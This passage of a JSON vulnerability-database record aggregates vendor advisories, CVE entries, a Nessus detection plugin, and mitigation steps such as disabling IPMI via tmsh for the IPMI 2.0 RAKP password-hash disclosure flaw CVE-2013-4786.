vulnerable| None \nLineRate| None| 2.5.0 - 2.6.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| IPMI \n \n1 The specified products, when running on the iSeries platform, contain the affected code. However, F5 identifies the vulnerability status as **Not vulnerable** because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\n**Note**: For information about BIG-IP hardware compatibility, refer to [K9476: The F5 hardware/software compatibility matrix](<https://support.f5.com/csp/article/K9476>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 recommends that you do not enable IPMI on iSeries platforms if it is not needed. If you must use IPMI, use a separate management Local Area Network (LAN) or Virtual Local Area Network (VLAN), Access Control Lists (ACLs), or Virtual Private Network (VPN) to limit and restrict access to your iLO management interfaces.\n\nTo disable IPMI, perform the following procedure:\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. To determine if IPMI is enabled, type the following command: \n\nlist /sys aom ipmi\n\n**Note**: IF IPMI is already disabled, you can skip step 3.\n\n 3. To disable IPMI, type the following command: \n\nmodify /sys aom ipmi disabled\n\nMitigation\n\nTo mitigate this vulnerability for Traffix SDC, you can perform the following tasks:\n\n * Disable IPMI if it is not needed. 
If you must use IPMI, use a separate management LAN or VLAN, ACLs, or VPN to limit and restrict access to your iLO management interfaces.\n * Maintain the latest IPMI version and Baseboard Management Controller (BMC) firmware that contains the most recent security patches.\n * Employ best practices in the management of the protocols and passwords on your systems and networks.\n * Use strong passwords.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2015-07-02T20:52:00", "type": "f5", "title": "IPMI vulnerability CVE-2013-4786", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2013-4786"], "modified": "2017-04-26T19:20:00", "id": "F5:K16846", "href": "https://support.f5.com/csp/article/K16846", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:14:50", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability for Traffix SDC, you can perform the following tasks:\n\n * Disable the Intelligent Plaform Management Interface (IPMI) if it is not needed. If you must use IPMI, use a separate management LAN or VLAN, Access Control Lists (ACLs), or VPN to limit and restrict access to your iLO management interfaces.\n * Maintain the latest IPMI version and Baseboard Management Controller (BMC) firmware that contains the most recent security patches.\n * Employ best practices in the management of the protocols and passwords on your systems and networks.\n * Use strong passwords.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 
"userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2015-07-02T00:00:00", "type": "f5", "title": "SOL16846 - IPMI vulnerability CVE-2013-4786", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786"], "modified": "2016-12-02T00:00:00", "id": "SOL16846", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16846.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2021-06-08T19:00:09", "description": "Information leakage of password.", "edition": 2, "cvss3": {}, "published": "2014-04-07T00:00:00", "title": "HP Integrated Lights-Out unauthorized access", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-4786"], "modified": "2014-04-07T00:00:00", "id": "SECURITYVULNS:VULN:13665", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13665", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04197764\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04197764\r\nVersion: 1\r\n\r\nHPSBHF02981 rev.1 - HP Integrated Lights-Out 2, 3, and 4 (iLO2, iLO3, iLO4),\r\nIPMI 2.0 RCMP+ Authentication Remote Password 
Hash Vulnerability (RAKP)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-03-13\r\nLast Updated: 2014-04-03\r\n\r\nPotential Security Impact: Disclosure of information, elevation of\r\nprivileges, privileged access.\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP Integrated\r\nLights-Out 2, 3, and 4 (iLO2, iLO3, iLO4). The vulnerability could be\r\nexploited to allow an attacker to gain unauthorized privileges and\r\nunauthorized access to privileged information.\r\n\r\nReferences: CVE-2013-4786 (SSRT101367)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Integrated Lights-Out 2, 3, and 4 (iLO2, iLO3, iLO4)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4786 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nThere is no resolution to this issue. The authentication process for the IPMI\r\n2.0 specification mandates that the server send a salted SHA1 or MD5 hash of\r\nthe requested user's password to the client, prior to the client\r\nauthenticating. The BMC returns the password hash for any valid user account\r\nrequested. This password hash can be broken using an offline brute force or\r\ndictionary attack. Because this functionality is a key part of the IPMI 2.0\r\nspecification, there is no way to fix the problem without deviating from the\r\nIPMI 2.0 specification. HP recommends the following actions to mitigate the\r\nrisk this introduces:\r\n\r\nIf you do not need to use IPMI, disable it. 
You can disable IPMI on iLO2/3/4\r\nusing the Disable IPMI over LAN command.\r\nMaintain the latest iLO firmware that contains the most recent security\r\npatches.\r\nEmploy best practices in the management of the protocols and passwords on\r\nyour systems and networks. Use strong passwords wherever possible.\r\nIf you must use IPMI, use a separate management LAN or VLAN, Access Control\r\nLists (ACLs), or VPN to limit and restrict access to your iLO management\r\ninterfaces.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, 
L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEUEARECAAYFAlM9cJsACgkQ4B86/C0qfVnbwACXXqq8fU9jBRG678VeC7u4dJ2c\r\nygCff0rQ7F3nDg4doYidlkJfVp8eh5s=\r\n=pGl4\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-07T00:00:00", "title": "[security bulletin] HPSBHF02981 rev.1 - HP Integrated Lights-Out 2, 3, and 4 (iLO2, iLO3, iLO4), IPMI 2.0 RCMP+ Authentication Remote Password Hash Vulnerability (RAKP)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-4786"], "modified": "2014-04-07T00:00:00", "id": "SECURITYVULNS:DOC:30452", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30452", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:53:19", "description": "The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange\nProtocol (RAKP) authentication, which allows remote attackers to obtain\npassword hashes and conduct offline password guessing attacks by obtaining\nthe HMAC from a RAKP message 2 response 
from a BMC.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | protocol problem. Not clear if fixes also need to be addressed in freeipmi and openipmi per Debian: \"Contacted relevant maintainers: Since few to no devices do mutual authentication, tools shipped by Debian are generally not affected. At best, the tools can print a warning for vulnerable devices.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2013-07-08T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4786", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786"], "modified": "2013-07-08T00:00:00", "id": "UB:CVE-2013-4786", "href": "https://ubuntu.com/security/CVE-2013-4786", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:52:15", "description": "The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by obtaining the HMAC from a RAKP message 2 response from a BMC.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2013-07-08T22:55:00", "type": "cve", "title": "CVE-2013-4786", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786"], "modified": "2020-10-29T00:15:00", "cpe": ["cpe:/a:intel:intelligent_platform_management_interface:2.0", "cpe:/o:oracle:fujitsu_m10_firmware:2290"], "id": "CVE-2013-4786", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4786", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:oracle:fujitsu_m10_firmware:2290:*:*:*:*:*:*:*", "cpe:2.3:a:intel:intelligent_platform_management_interface:2.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-09-13T02:47:20", "description": "The remote host supports IPMI v2.0. The Intelligent Platform Management Interface (IPMI) protocol is affected by an information disclosure vulnerability due to the support of RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication. 
A remote attacker can obtain password hash information for valid user accounts via the HMAC from a RAKP message 2 response from a BMC.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-12-18T00:00:00", "type": "nessus", "title": "IPMI v2.0 Password Hash Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4786"], "modified": "2020-06-12T00:00:00", "cpe": [], "id": "IPMI_PASSHASH_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/80101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80101);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2013-4786\");\n script_bugtraq_id(61076);\n\n script_name(english:\"IPMI v2.0 Password Hash Disclosure\");\n script_summary(english:\"Checks if the server supports IPMI v2.0.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host supports IPMI version 2.0.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host supports IPMI v2.0. The Intelligent Platform\nManagement Interface (IPMI) protocol is affected by an information\ndisclosure vulnerability due to the support of RMCP+ Authenticated\nKey-Exchange Protocol (RAKP) authentication. A remote attacker can\nobtain password hash information for valid user accounts via the HMAC\nfrom a RAKP message 2 response from a BMC.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://fish2.com/ipmi/remote-pw-cracking.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is no patch for this vulnerability; it is an inherent problem\nwith the specification for IPMI v2.0. 
Suggested mitigations include :\n\n - Disabling IPMI over LAN if it is not needed.\n\n - Using strong passwords to limit the successfulness of\n off-line dictionary attacks.\n\n - Using Access Control Lists (ACLs) or isolated networks\n to limit access to your IPMI management interfaces.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4786\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ipmi_supported_versions.nbin\");\n script_require_ports(\"Services/udp/asf-rmcp\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude(\"global_settings.inc\");\ninclude('misc_func.inc');\n\nvar ipmi_channels, ipmi_v2_enabled;\n\nport = get_service(svc:\"asf-rmcp\", ipproto:\"udp\", exit_on_fail:TRUE);\n\nipmi_channels = get_kb_list(\"ipmi/\"+port+\"/channels/*/v2.0\");\n\nif (isnull(ipmi_channels ))\n{\n audit(AUDIT_NOT_DETECT, \"IPMI\", port);\n}\n\nipmi_v2_enabled = FALSE;\nforeach ipmi_channel_v2_enabled (ipmi_channels)\n{\n if (ipmi_channel_v2_enabled == 1)\n {\n ipmi_v2_enabled = TRUE;\n break;\n }\n}\n\nif (!ipmi_v2_enabled)\n{\n audit(AUDIT_LISTEN_NOT_VULN, \"IPMI\", port);\n}\n\n# Report our findings.\nreport = '';\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus detected that the remote server has IPMI v2.0 implemented.'+\n '\\nRemote unauthenticated users will be able to get password hashes'+\n '\\nfor valid users.'+\n '\\n';\n}\n\nsecurity_hole(port:port, proto:\"udp\", extra:report);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "jvn": [{"lastseen": "2021-12-28T23:20:13", "description": "In Intelligent Platform Management Interface (IPMI) v1.5, Remote Management Control Protocol (RMCP) to access BMC through LAN is prescribed. \n \nMultiple NEC products which conduct RMCP access using IPMI over LAN contain an issue in implementations of the BMC firmware and when accessing BMC through RMCP using LAN, unauthorized session may be established.\n\n ## Impact\n\nA logged-in remote attacker may obtain/modify BMC setting information, obtain monitoring information or reboot/shut down the product.\n\n ## Solution\n\n**Do not use IPMI over LAN at products** \nIt is recommended to stop using IPMI over LAN in the products. \nIPMI 2.0 contains a known vulnerability (CVE-2013-4786) where the password hashes may be obtained. 
Therefore, disable IPMI over LAN in the products to avoid the effects of this vulnerability. \nAccording to the developer, IPMI over LAN is enabled by default in the affected products, but would not function if a LAN cable is not connected to the BMC LAN port. \n \n**Apply a Workaround** \nIf the product's IPMI over LAN must be used, apply the following workaround to mitigate the effects of this vulnerability. \n\n * Apply BMC firmware Rev1.10 or later, in which this vulnerability is addressed, and use the product only in a safe intranet protected by a firewall and do not connect the BMC to the Internet.\n\n ## Products Affected\n\nThe following products, to which Baseboard Management Controller (BMC) firmware Rev1.09 or earlier is applied, are affected. \n\n * Express5800/T110j\n * Express5800/T110j-S\n * Express5800/T110j (2nd-Gen)\n * Express5800/T110j-S (2nd-Gen)\n * iStorage NS100Ti\n * Express5800/GT110j\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-04T00:00:00", "type": "jvn", "title": "JVN#38752718: Multiple NEC Products vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2013-4786", "CVE-2020-5633"], "modified": "2021-01-12T00:00:00", "id": "JVN:38752718", "href": "http://jvn.jp/en/jp/JVN38752718/index.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "avleonov": [{"lastseen": "2020-02-23T21:33:45", "description": "I've just read [a nice article about Vulnerability Management](<https://habr.com/ru/company/acribia/blog/487780/>) in the [Acribia](<https://en.acribia.ru>) blog (in Russian). An extract and my _comments_ below. \n\nIn most cases Vulnerability Management is not about Vulnerabilities, but about Management. Just filtering the most critical vulnerabilities is not enough.\n\nPractical Cases:\n\n 1. \"Oh, yes, we know ourselves that everything is bad!\" - [CVE-2013-4786](<https://nvd.nist.gov/vuln/detail/CVE-2013-4786>) IPMI password hash disclosure on > 500 servers. Customer just accepted the risks, Acribia proposed an effective workaround (brute-force-resistant user IDs and passwords)._ It's often hard to figure out the right remediation measures and implement them. Someone should do it!_\n 2. \"We can download OpenVAS without your help!\" - [CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) Cisco Smart Install RCE on 350 hosts. Vulnerability detection rules of several Vulnerability Scanners were not good enough to detect this vulnerability. _Do not rely on scanners, know how they work and their limitations._\n 3. \"If the attackers wanted to hack us, they would have already done it!\" - [CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>) ([MS17-010](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) Windows SMB RCE on a domain controller and several other critical servers. Vulnerability was detected in infrastructure several times, the remediation was agreed with the management, but it was ignored by the responsible IT staff. 
As a result, during the next successful [WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>)-like malware attack the servers, including the DC were destroyed. _Vulnerability Management is about the willingness to patch anything, very quickly, as often as required. Otherwise, it makes no sense._\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-11T13:46:54", "type": "avleonov", "title": "Is Vulnerability Management more about Vulnerabilities or Management?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786", "CVE-2017-0144", "CVE-2018-0171"], "modified": "2020-02-11T13:46:54", "id": "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "href": "http://feedproxy.google.com/~r/avleonov/~3/HjLo7EOJYWA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:53:03", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. 
Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 136 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n** Please note that on March 23, 2016, Oracle released [Security Alert for Java SE for CVE-2016-0636](<http://www.oracle.com/technetwork/topics/security/alert-cve-2016-0636-2949497.html>). Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced for CVE-2016-0636. **\n\nPlease also note that the vulnerabilities in this Critical Patch Update are scored using versions 3.0 and 2.0 of Common Vulnerability Scoring Standard (CVSS). Future Critical Patch Updates and Security Alerts will be scored using CVSS version 3.0 only.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. 
More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "edition": 2, "cvss3": {}, "published": "2016-04-19T00:00:00", "type": "oracle", "title": "cpuapr2016v3", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-4000", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0681", "CVE-2016-0641", "CVE-2014-3566", "CVE-2016-3436", "CVE-2011-4461", "CVE-2016-0697", "CVE-2015-1793", "CVE-2015-7236", "CVE-2015-3197", "CVE-2016-3457", "CVE-2016-3417", "CVE-2016-3441", "CVE-2016-3426", "CVE-2016-0699", "CVE-2016-0407", "CVE-2016-0623", "CVE-2016-0705", "CVE-2016-3423", "CVE-2013-4786", "CVE-2016-3418", "CVE-2016-0695", "CVE-2015-7181", "CVE-2015-1789", "CVE-2015-1794", "CVE-2016-3427", "CVE-2016-0682", "CVE-2016-2047", "CVE-2015-3195", "CVE-2016-0798", "CVE-2016-0677", "CVE-2014-3576", "CVE-2016-0649", "CVE-2016-0698", "CVE-2016-3462", "CVE-2016-0639", "CVE-2016-0696", "CVE-2016-0669", "CVE-2016-0692", "CVE-2016-0799", "CVE-2016-0694", "CVE-2016-3449", "CVE-2016-0469", "CVE-2016-0662", "CVE-2016-0680", "CVE-2016-0678", "CVE-2015-3194", "CVE-2015-7501", "CVE-2015-3253", "CVE-2016-3463", "CVE-2016-0646", "CVE-2016-3420", "CVE-2016-3422", "CVE-2016-3416", "CVE-2016-0674", "CVE-2016-0668", "CVE-2016-3431", "CVE-2015-3238", "CVE-2016-0797", "CVE-2015-7182", "CVE-2016-0702", "CVE-2015-2808", "CVE-2016-3419", "CVE-2015-7575", "CVE-2016-3456", "CVE-2014-2532", "CVE-2016-0679", "CVE-2016-0685", "CVE-2015-3196", "CVE-2016-0666", "CVE-2015-2721", "CVE-2015-3193", 